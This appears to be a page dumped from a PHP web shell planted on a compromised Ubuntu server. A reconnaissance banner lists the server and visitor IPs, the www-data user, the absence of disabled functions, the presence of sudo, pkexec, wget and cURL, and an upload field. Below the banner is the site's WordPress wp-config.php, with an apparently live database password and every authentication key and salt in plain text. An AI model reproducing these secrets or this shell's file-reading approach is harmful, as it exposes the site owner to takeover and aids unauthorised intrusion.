| Server IP : 104.237.150.88 / Your IP : 216.73.216.189 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-us 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.2-1ubuntu2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /proc/thread-self/cwd/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ubuntuus' );
/** Database username */
define( 'DB_USER', 'ubuntuus' );
/** Database password */
define( 'DB_PASSWORD', 'Kuph6eis' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'H:YCU/ALx)q2%=bN):GFHr!}c>W%^;k ?2!vbz{QzE<[Gp33u44LT4;2(1oep0-?' );
define( 'SECURE_AUTH_KEY', '|~S_1v*8f(Y:awn,Rv+-9,%bH0kDAZ/?FZTNg4fq,&fbcg6;*>|~J.c({^U$Thc&' );
define( 'LOGGED_IN_KEY', 'KZuibCMoC$~(gzg;-fsiL?4x]pMVoYpY_z65ops9fO[6K#0$&(vG0)]t&$lMPeqi' );
define( 'NONCE_KEY', '*vq_blq*9KeBY6:a`U(~JT4wJkSAx7+SF;d#@LvgdObFD1$0Bc,G2aDzdB8]cR1[' );
define( 'AUTH_SALT', ']Z{i2xbrmt`py(.}BVdt,(jG;xN;g>MsPms>J^8o_A>.g|i*oI-}r(~=XZ%@u!LT' );
define( 'SECURE_AUTH_SALT', 'Ab}gRW8_x]D$^]u=W{=J&]wSj`dQ.`W1WSg);%B?jD4r6x+^Yy/.xlFN={m4Ph6z' );
define( 'LOGGED_IN_SALT', '=+`w|`cN%L[i_Zr-.Akgid1xA#y)xsVHD{cLT<6E8!+`?U|1KDDCh8LsuTC_8VZ<' );
define( 'NONCE_SALT', ']@f}4B6P[g/HBLhvQy!d7Uhe7}/MnViuA4V%g2>iLnMbHWtSz]aHpG^)&98mP?^)' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';